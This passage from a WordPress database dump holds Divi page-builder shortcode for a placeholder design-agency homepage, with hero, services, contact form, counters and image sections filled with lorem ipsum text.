text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 21:11:40','2020-07-02 21:11:40','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(164,1,'2020-07-02 21:20:50','2020-07-02 21:20:50','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"Desktop HD\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"Montserrat|500||on|||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_letter_spacing=\"3px\" custom_margin=\"||45px|\" animation_style=\"slide\" animation_direction=\"bottom\" hover_enabled=\"0\" locked=\"off\"]<p style=\"text-align: center;\">We are a full service</p>\n[/et_pb_text][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"||40px|\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1 style=\"text-align: center;\">Creative<br /> <span style=\"color: #353740;\">Design Agency</span></h1>\n[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" custom_margin=\"||50px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"17%\" locked=\"off\"]<p style=\"text-align: center;\">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has normal.</p>[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" 